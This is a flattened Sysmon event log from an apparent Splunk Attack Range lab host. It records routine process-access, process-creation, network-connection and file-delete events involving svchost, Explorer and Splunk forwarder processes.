18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:28.298{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4FB8-613A-7790-03000000C801}344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.298{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FB8-613A-7790-03000000C801}344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.283{B81B27B7-4FB8-613A-7790-03000000C801}344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035085939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:52.226{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56780-false10.0.1.12-8000- 23542300x800000000000000035085938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.229{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6CD6341771320CA705ECB6230E2930B,SHA256=4A22570912E4614505510CA557E552E9444508EA2ED0483ADBBBE9A34B0179B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:29.512{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D062A4ECC83D62BBCE4B4D820122B985,SHA256=1D17356F176FCA292650497947822D62114AFA2248B6B1FF7238799EAD8A2E66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035085958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:29.512{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=844183E5DC9E4E6D7634325CCFEEBE3C,SHA256=A451EAB8D6837099E52892ADAB79F24782E44802DAD47EA5689C73E579C4969F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:29.243{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C414EB45256597076B5A1DC15B2378,SHA256=57659222F59C052D41D559E55A9D1E6720BA4F5AB763C63254905D45D461236A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:29.143{B81B27B7-4FB8-613A-7890-03000000C801}46285644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:28.997{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FB8-613A-7890-03000000C801}4628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:30.426{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBC4F86109AA2C986C0B1BDC4FC27D4E,SHA256=7FFEE2E408AB6FA8B88D1A2A31BF6F3DEDB4420FA5476ADED76DA7BFBFBBD209,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:31.971{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF7185a417.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:31.525{B81B27B7-4FB2-613A-7690-03000000C801}2616ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:31.441{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D8766BAE86912DECC5CD0B9F585F990,SHA256=A16E7EC1FD1BDE5D28F4DC72347771579A42609237E5DDFEAB6E538155849525,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 